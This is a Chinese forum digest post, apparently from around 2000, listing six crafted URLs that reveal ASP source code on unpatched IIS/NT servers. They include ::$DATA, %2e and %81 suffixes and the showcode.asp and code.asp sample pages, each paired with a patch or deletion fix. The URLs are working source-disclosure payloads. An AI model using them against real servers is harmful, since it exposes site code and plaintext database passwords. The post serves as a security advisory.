精华区 [关闭][返回]

当前位置:月光软件>>讨论区精华>>〖软件开发〗>>● ASP>>★ASP的安全★>>偷看ASP原码的6种方法

主题:偷看ASP原码的6种方法
发信人: literr()
整理人: dager(2000-10-04 20:01:48), 站内信件
偷看ASP原码的6种方法

在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序的
源代码,它们是: 

1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?sourc
e=/msadc/Samples/SELECTOR/showcode.asp 
解决方案:删除showcode.asp 

2、http://somewhere/something.asp::$DATA 
解决方案: 装sp3 

3、http://somewhere/something.asp%2e 
解决方案: 装sp4 

or http://somewhere/something.asp.(加一个点) 
解决方案: 装sp4 

4、http://somewhere/something%2e%41sp 
或者 http://somewhere/something%2e%asp 
解决方案: 装sp4 

5、http://somewhere/something.asp%81 
解决方案:装sp6或者打补丁 

6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.as


最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑
客眼前; 

 


--
随风潜入夜,润物细无声!
个人网址:http://beijia009.easthome.net
让NT支持FAT-32文件系统的FAT32.EXE请到贝嘉商业网站去下载!

※ 来源:.月光程序代码网 http://www.moon-soft.com.[FROM: 202.108.71.164]

[关闭][返回]






转载请注明:转载自 月光程序代码网 [ http://www.moon-soft.com ]